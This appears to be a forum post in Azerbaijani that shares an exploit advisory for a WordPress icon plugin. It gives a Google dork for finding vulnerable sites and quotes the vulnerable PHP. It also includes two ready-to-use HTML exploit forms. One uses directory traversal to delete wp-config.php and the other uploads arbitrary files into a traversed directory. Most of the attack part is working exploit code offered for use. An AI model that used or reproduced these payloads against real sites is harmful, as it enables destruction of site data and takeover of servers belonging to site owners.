Videoda tam izah vermişəm qaranlığ qalan yer olsa PM ata bilərsiniz
Kod:
Exploit Title : WordPress Plugin 'Category and Page Icons' Multiple Vulnerabilities
Exploit Author : NULL_Pointer
Date : 2014-09-29
Download Link : https://downloads.wordpress.org/plugin/category-page-icons.zip
Version : 0.9.1
Google Dork : inurl:/wp-content/plugins/category-page-icons/
--------------------------------------------------------------
1. Arbitrary File Deletion :
The vulnerable code is located in 'include/wpdev-flash-uploader.php' :
171. $action = $_POST['ajax_action'];
172. if ( isset($action) ) {
173. switch ( $action ) :
174. case 'delete-image' :
175. $path = $_POST['file_name_dir'] . '/' . $_POST['file_name_org'];
176. $name_parts = pathinfo($path);
177. $ext = $name_parts['extension'];
178. $file_name_only = trim( substr( $name_parts['basename'], 0, -(1 + strlen($ext)) ) );
179. $path_icon = $_POST['file_name_dir'] . '/' . $file_name_only . $_POST['fileicon_size'] ;
180. if (file_exists($path)) unlink( $path );
This issue allows an attacker to influence calls to the 'unlink()' function and delete arbitrary files. Due to a lack of input validation, an attacker can supply directory traversal sequences followed by an arbitrary file name to delete specific files.
Exploit :
<html>
<form action="http://127.0.0.1/wp/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="POST">
<input type="hidden" name="ajax_action" value="delete-image">
<input type="text" name="file_name_dir" value = "../../../../">
<input type="text" name="file_name_org" value = "wp-config.php">
<input type="submit" value="Delete it">
</form>
</html>
2. Unrestricted File Upload :
This application has an upload feature that allows any user to upload arbitrary files.
Allowed Extensions : txt, htm, html, jpg, png...etc
Exploit :
<html>
<form action="http://127.0.0.1/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="POST" enctype="multipart/form-data">
Choose File to upload : <input type="file" name="wpdev-async-upload"><br />
Directory : <input type="text" name="dir_icons" value="../../../../"><br />
<input type="submit" value="Upload">
</form>
</html>